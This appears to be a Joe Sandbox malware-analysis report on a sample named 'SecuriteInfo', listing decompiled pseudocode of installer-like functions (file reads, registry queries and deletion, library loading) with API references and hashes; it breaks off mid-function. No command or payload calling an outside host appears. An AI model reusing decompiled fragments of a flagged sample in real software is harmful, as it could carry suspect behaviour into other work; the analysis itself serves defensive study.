                                                              0x00403597
                                                              0x00000000
                                                              0x00000000
                                                              0x00403599
                                                              0x00403599
                                                              0x004035ac
                                                              0x00000000
                                                              0x00000000
                                                              0x004035bb
                                                              0x00000000
                                                              0x004035bb
                                                              0x00403574
                                                              0x0040357b
                                                              0x004035c8
                                                              0x004035ce
                                                              0x004035ce
                                                              0x00000000
                                                              0x004035ce
                                                              0x0040357d
                                                              0x00403583
                                                              0x00403589
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004035cc
                                                              0x004035cc
                                                              0x00000000
                                                              0x004035cc
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                              • SetFilePointer.KERNELBASE(0000788B,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$CountTick
                                                              • String ID:
                                                              • API String ID: 1092082344-0
                                                              • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                              • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                              • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                              • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 60%
                                                              			E004020D8(void* __ebx, void* __eflags) {
                                                              				struct HINSTANCE__* _t23;
                                                              				struct HINSTANCE__* _t31;
                                                              				void* _t32;
                                                              				WCHAR* _t35;
                                                              				intOrPtr* _t36;
                                                              				void* _t37;
                                                              				void* _t39;
                                                              
                                                              				_t32 = __ebx;
                                                              				asm("sbb eax, 0x42a320");
                                                              				 *(_t39 - 4) = 1;
                                                              				if(__eflags < 0) {
                                                              					_push(0xffffffe7);
                                                              					L15:
                                                              					E00401423();
                                                              					L16:
                                                              					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                              					return 0;
                                                              				}
                                                              				_t35 = E00402DA6(0xfffffff0);
                                                              				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                              				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                              					L3:
                                                              					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                              					_t47 = _t23 - _t32;
                                                              					 *(_t39 + 8) = _t23;
                                                              					if(_t23 == _t32) {
                                                              						_push(0xfffffff6);
                                                              						goto L15;
                                                              					}
                                                              					L4:
                                                              					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                              					if(_t36 == _t32) {
                                                              						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                              					} else {
                                                              						 *(_t39 - 4) = _t32;
                                                              						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                              							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                                              						} else {
                                                              							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                              							if( *_t36() != 0) {
                                                              								 *(_t39 - 4) = 1;
                                                              							}
                                                              						}
                                                              					}
                                                              					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                                              						FreeLibrary( *(_t39 + 8));
                                                              					}
                                                              					goto L16;
                                                              				}
                                                              				_t31 = GetModuleHandleW(_t35); // executed
                                                              				 *(_t39 + 8) = _t31;
                                                              				if(_t31 != __ebx) {
                                                              					goto L4;
                                                              				}
                                                              				goto L3;
                                                              			}










                                                              0x004020d8
                                                              0x004020d8
                                                              0x004020dd
                                                              0x004020e4
                                                              0x004021a3
                                                              0x004022f1
                                                              0x004022f1
                                                              0x00402c2a
                                                              0x00402c2d
                                                              0x00402c39
                                                              0x00402c39
                                                              0x004020f3
                                                              0x004020fd
                                                              0x00402100
                                                              0x00402110
                                                              0x00402114
                                                              0x0040211a
                                                              0x0040211c
                                                              0x0040211f
                                                              0x0040219c
                                                              0x00000000
                                                              0x0040219c
                                                              0x00402121
                                                              0x0040212c
                                                              0x00402130
                                                              0x00402170
                                                              0x00402132
                                                              0x00402135
                                                              0x00402138
                                                              0x00402164
                                                              0x0040213a
                                                              0x0040213d
                                                              0x00402146
                                                              0x00402148
                                                              0x00402148
                                                              0x00402146
                                                              0x00402138
                                                              0x00402178
                                                              0x00402191
                                                              0x00402191
                                                              0x00000000
                                                              0x00402178
                                                              0x00402103
                                                              0x0040210b
                                                              0x0040210e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
                                                              • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                              • Opcode Fuzzy Hash: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
                                                              • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                              				void* _t9;
                                                              				int _t10;
                                                              				long _t13;
                                                              				int* _t16;
                                                              				intOrPtr _t21;
                                                              				short* _t22;
                                                              				void* _t24;
                                                              				void* _t26;
                                                              				void* _t29;
                                                              
                                                              				_t22 = __edi;
                                                              				_t21 = __edx;
                                                              				_t16 = __ebx;
                                                              				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                              				_t24 = _t9;
                                                              				_t10 = E00402D84(3);
                                                              				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                              				 *__edi = __ebx;
                                                              				if(_t24 == __ebx) {
                                                              					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                              				} else {
                                                              					 *(_t26 + 8) = 0x3ff;
                                                              					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                              						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                              						__eflags = _t13;
                                                              						if(_t13 != 0) {
                                                              							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                              						}
                                                              					} else {
                                                              						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                                              					}
                                                              					_t22[0x3ff] = _t16;
                                                              					_push(_t24); // executed
                                                              					RegCloseKey(); // executed
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                              				return 0;
                                                              			}












                                                              0x0040259e
                                                              0x0040259e
                                                              0x0040259e
                                                              0x004025a3
                                                              0x004025aa
                                                              0x004025ac
                                                              0x004025b4
                                                              0x004025b7
                                                              0x004025ba
                                                              0x0040292e
                                                              0x004025c0
                                                              0x004025c8
                                                              0x004025cb
                                                              0x004025e4
                                                              0x004025ea
                                                              0x004025ec
                                                              0x004025ee
                                                              0x004025ee
                                                              0x004025cd
                                                              0x004025d1
                                                              0x004025d1
                                                              0x004025f5
                                                              0x004025fc
                                                              0x004025fd
                                                              0x004025fd
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                              • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi821.tmp,00000000,00000011,00000002), ref: 004025FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseValue
                                                              • String ID:
                                                              • API String ID: 397863658-0
                                                              • Opcode ID: e8b09821373b1692f20764f64567a9709107b9d1653e5a45d9dc4388860ff9c6
                                                              • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                              • Opcode Fuzzy Hash: e8b09821373b1692f20764f64567a9709107b9d1653e5a45d9dc4388860ff9c6
                                                              • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                              				long _v8;
                                                              				long _t21;
                                                              				long _t22;
                                                              				void* _t24;
                                                              				long _t26;
                                                              				int _t27;
                                                              				long _t28;
                                                              				void* _t29;
                                                              				void* _t30;
                                                              				long _t31;
                                                              				long _t32;
                                                              				long _t36;
                                                              
                                                              				_t21 = _a4;
                                                              				if(_t21 >= 0) {
                                                              					_t32 = _t21 +  *0x42a2b8;
                                                              					 *0x420ef4 = _t32;
                                                              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                              				}
                                                              				_t22 = E00403479(4);
                                                              				if(_t22 >= 0) {
                                                              					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                              					if(_t24 == 0) {
                                                              						L18:
                                                              						_push(0xfffffffd);
                                                              						goto L19;
                                                              					} else {
                                                              						 *0x420ef4 =  *0x420ef4 + 4;
                                                              						_t36 = E00403479(_a4);
                                                              						if(_t36 < 0) {
                                                              							L21:
                                                              							_t22 = _t36;
                                                              						} else {
                                                              							if(_a12 != 0) {
                                                              								_t26 = _a4;
                                                              								if(_t26 >= _a16) {
                                                              									_t26 = _a16;
                                                              								}
                                                              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                              								if(_t27 != 0) {
                                                              									_t36 = _v8;
                                                              									 *0x420ef4 =  *0x420ef4 + _t36;
                                                              									goto L21;
                                                              								} else {
                                                              									goto L18;
                                                              								}
                                                              							} else {
                                                              								if(_a4 <= 0) {
                                                              									goto L21;
                                                              								} else {
                                                              									while(1) {
                                                              										_t28 = _a4;
                                                              										if(_a4 >= 0x4000) {
                                                              											_t28 = 0x4000;
                                                              										}
                                                              										_v8 = _t28;
                                                              										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                              										if(_t29 == 0) {
                                                              											goto L18;
                                                              										}
                                                              										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                              										if(_t30 == 0) {
                                                              											_push(0xfffffffe);
                                                              											L19:
                                                              											_pop(_t22);
                                                              										} else {
                                                              											_t31 = _v8;
                                                              											_a4 = _a4 - _t31;
                                                              											 *0x420ef4 =  *0x420ef4 + _t31;
                                                              											_t36 = _t36 + _t31;
                                                              											if(_a4 > 0) {
                                                              												continue;
                                                              											} else {
                                                              												goto L21;
                                                              											}
                                                              										}
                                                              										goto L22;
                                                              									}
                                                              									goto L18;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				L22:
                                                              				return _t22;
                                                              			}















                                                              0x00403375
                                                              0x0040337e
                                                              0x00403387
                                                              0x0040338b
                                                              0x00403396
                                                              0x00403396
                                                              0x0040339e
                                                              0x004033a5
                                                              0x004033b7
                                                              0x004033be
                                                              0x00403463
                                                              0x00403463
                                                              0x00000000
                                                              0x004033c4
                                                              0x004033c7
                                                              0x004033d3
                                                              0x004033d7
                                                              0x00403471
                                                              0x00403471
                                                              0x004033dd
                                                              0x004033e0
                                                              0x0040343f
                                                              0x00403445
                                                              0x00403447
                                                              0x00403447
                                                              0x00403459
                                                              0x00403461
                                                              0x00403468
                                                              0x0040346b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004033e2
                                                              0x004033e5
                                                              0x00000000
                                                              0x004033eb
                                                              0x004033f0
                                                              0x004033f7
                                                              0x004033fa
                                                              0x004033fc
                                                              0x004033fc
                                                              0x00403409
                                                              0x0040340c
                                                              0x00403413
                                                              0x00000000
                                                              0x00000000
                                                              0x0040341c
                                                              0x00403423
                                                              0x0040343b
                                                              0x00403465
                                                              0x00403465
                                                              0x00403425
                                                              0x00403425
                                                              0x00403428
                                                              0x0040342b
                                                              0x00403431
                                                              0x00403437
                                                              0x00000000
                                                              0x00403439
                                                              0x00000000
                                                              0x00403439
                                                              0x00403437
                                                              0x00000000
                                                              0x00403423
                                                              0x00000000
                                                              0x004033f0
                                                              0x004033e5
                                                              0x004033e0
                                                              0x004033d7
                                                              0x004033be
                                                              0x00403473
                                                              0x00403476

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                              • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                              • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                              • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E0040252A(int* __ebx, char* __edi) {
                                                              				void* _t17;
                                                              				short* _t18;
                                                              				void* _t35;
                                                              				void* _t37;
                                                              				void* _t40;
                                                              
                                                              				_t33 = __edi;
                                                              				_t27 = __ebx;
                                                              				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                              				_t35 = _t17;
                                                              				_t18 = E00402DA6(0x33);
                                                              				 *__edi = __ebx;
                                                              				if(_t35 == __ebx) {
                                                              					 *(_t37 - 4) = 1;
                                                              				} else {
                                                              					 *(_t37 - 0x10) = 0x800;
                                                              					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                              						L7:
                                                              						 *_t33 = _t27;
                                                              						 *(_t37 - 4) = 1;
                                                              					} else {
                                                              						if( *(_t37 + 8) == 4) {
                                                              							__eflags =  *(_t37 - 0x20) - __ebx;
                                                              							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                              							E004065AF(__edi,  *__edi);
                                                              						} else {
                                                              							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                              								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                              								_t33[0x7fe] = _t27;
                                                              							} else {
                                                              								goto L7;
                                                              							}
                                                              						}
                                                              					}
                                                              					_push(_t35); // executed
                                                              					RegCloseKey(); // executed
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                              				return 0;
                                                              			}








                                                              0x0040252a
                                                              0x0040252a
                                                              0x0040252f
                                                              0x00402536
                                                              0x00402538
                                                              0x0040253f
                                                              0x00402542
                                                              0x0040292e
                                                              0x00402548
                                                              0x0040254b
                                                              0x00402566
                                                              0x00402596
                                                              0x00402596
                                                              0x00402599
                                                              0x00402568
                                                              0x0040256c
                                                              0x00402585
                                                              0x0040258c
                                                              0x0040258f
                                                              0x0040256e
                                                              0x00402571
                                                              0x0040257c
                                                              0x004025f5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402571
                                                              0x0040256c
                                                              0x004025fc
                                                              0x004025fd
                                                              0x004025fd
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi821.tmp,00000000,00000011,00000002), ref: 004025FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID:
                                                              • API String ID: 3356406503-0
                                                              • Opcode ID: dd0599e4b52b61a1ac7a58c04e418f58fda78ccec35c85f03be81c2e2baa07e3
                                                              • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                              • Opcode Fuzzy Hash: dd0599e4b52b61a1ac7a58c04e418f58fda78ccec35c85f03be81c2e2baa07e3
                                                              • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E00401389(signed int _a4, struct HWND__* _a10) {
                                                              				intOrPtr* _t6;
                                                              				void* _t8;
                                                              				void* _t10;
                                                              				signed int _t11;
                                                              				void* _t12;
                                                              				signed int _t16;
                                                              				signed int _t17;
                                                              
                                                              				_t17 = _a4;
                                                              				while(_t17 >= 0) {
                                                              					_t6 = _t17 * 0x1c +  *0x42a290;
                                                              					if( *_t6 == 1) {
                                                              						break;
                                                              					}
                                                              					_push(_t6); // executed
                                                              					_t8 = E00401434(); // executed
                                                              					if(_t8 == 0x7fffffff) {
                                                              						return 0x7fffffff;
                                                              					}
                                                              					_t10 = E0040136D(_t8);
                                                              					if(_t10 != 0) {
                                                              						_t11 = _t10 - 1;
                                                              						_t16 = _t17;
                                                              						_t17 = _t11;
                                                              						_t12 = _t11 - _t16;
                                                              					} else {
                                                              						_t12 = _t10 + 1;
                                                              						_t17 = _t17 + 1;
                                                              					}
                                                              					if(_a10 != 0) {
                                                              						 *0x42924c =  *0x42924c + _t12;
                                                              						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                              					}
                                                              				}
                                                              				return 0;
                                                              			}










                                                              0x0040138a
                                                              0x004013fa
                                                              0x0040139b
                                                              0x004013a0
                                                              0x00000000
                                                              0x00000000
                                                              0x004013a2
                                                              0x004013a3
                                                              0x004013ad
                                                              0x00000000
                                                              0x00401404
                                                              0x004013b0
                                                              0x004013b7
                                                              0x004013bd
                                                              0x004013be
                                                              0x004013c0
                                                              0x004013c2
                                                              0x004013b9
                                                              0x004013b9
                                                              0x004013ba
                                                              0x004013ba
                                                              0x004013c9
                                                              0x004013cb
                                                              0x004013f4
                                                              0x004013f4
                                                              0x004013c9
                                                              0x00000000

                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                              • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                              • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                              • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402434(void* __ebx) {
                                                              				long _t7;
                                                              				void* _t10;
                                                              				void* _t14;
                                                              				long _t18;
                                                              				intOrPtr _t20;
                                                              				void* _t22;
                                                              				void* _t23;
                                                              
                                                              				_t14 = __ebx;
                                                              				_t26 =  *(_t23 - 0x20) - __ebx;
                                                              				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                              				if( *(_t23 - 0x20) != __ebx) {
                                                              					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                              					_t18 = _t7;
                                                              					goto L4;
                                                              				} else {
                                                              					_t10 = E00402DE6(_t26, 2); // executed
                                                              					_t22 = _t10;
                                                              					if(_t22 == __ebx) {
                                                              						L6:
                                                              						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                              					} else {
                                                              						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                              						RegCloseKey(_t22);
                                                              						L4:
                                                              						if(_t18 != _t14) {
                                                              							goto L6;
                                                              						}
                                                              					}
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
